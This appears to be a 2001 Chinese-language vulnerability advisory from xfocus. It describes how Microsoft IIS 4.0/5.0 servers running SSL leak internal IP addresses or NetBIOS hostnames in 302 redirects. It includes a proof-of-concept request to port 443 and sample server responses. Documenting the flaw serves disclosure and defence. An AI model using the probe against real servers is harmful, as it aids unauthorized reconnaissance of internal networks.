xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Microsoft-IIS 4.0 & 5.0 会泄露内部IP地址


发布时间:2001-08-09
更新时间:2001-08-09
严重程度:
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式

受影响系统
Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL
详细描述
使用PERL(SSLeay)或者其他工具手工连接端口TCP/443,远程用户可以获得内部IP地址或者泄露机器网络节点主机名。

测试代码
1-使用普通SSL浏览器和找任意目录,如:

https://www.target.com/images/icon.gif
2-使用兼容的SSL PERL脚本,执行对目标端口443执行如下命令:

GET /images HTTP/1.0

3-会产生如下结果:

HTTP/1.1 302 Object Moved
        Location: https://192.168.1.10/images/
        Server: Microsoft-IIS/4.0
        Content-Type: text/html
        Content-Length: xxx

        或者

        HTTP/1.1 302 Object Moved
        Location: https://netbiosname/images/
        Server: Microsoft-IIS/4.0
        Content-Type: text/html
        Content-Length: xxx

解决方案
尚无

相关信息
enquiries@ggs-au.com
http://www.ggs-au.com